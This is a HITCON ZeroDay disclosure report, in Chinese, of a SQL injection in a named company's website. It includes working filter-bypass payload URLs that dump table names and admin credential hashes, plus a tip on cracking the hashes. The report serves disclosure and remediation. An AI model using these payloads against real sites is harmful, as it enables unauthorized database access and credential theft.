Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-00654
- 發信 Vendor: 悅禾生活事業股份有限公司
- Title: 悅禾莊園公司資料庫注入漏洞
- Introduction: 資料庫注入漏洞
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2018/05/07 21:21:22 : 新提交 (由 mitv 更新此狀態)
- 2018/05/07 22:11:09 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/05/14 23:07:46 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/05/14 23:07:46 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/07/07 03:00:11 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2018-00654
- 通報者:vtim9907 (mitv)
- 風險:中
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
敘述
preferential.php 頁面的參數 id 存在 sql injection 的漏洞,嘗試注入發現有過濾單引號和 "union select" 字串,但單引號可以用16進位繞過,而僅僅過濾 "union select" 作用也不大,可以用 union all select 繞過:
查詢 table 名稱:
http://www.villa-like.com.tw/preferential.php?id=0 union all select 1,2,3,concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables where table_schema=database()-- -
查詢完 column name 後,查詢 column 內的值,密碼雖然 hash 過,但到 CrackStation 之類的網站還是可以反查到明碼:
http://www.villa-like.com.tw/preferential.php?id=0 union all select 1,2,3,concat(id,0x3a,account,0x3a,group_id,0x3a,name,0x3a,password,0x3a,status),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from villalike_admin-- -
#附註
曾逛過此網站,那時完全沒有過濾,這次發現有做一點防護,但做的不完全,如果要過濾的話可以過濾的更紮實,不然就用參數化查詢之類的方式修正 query 的 code,然後可以關掉 error report。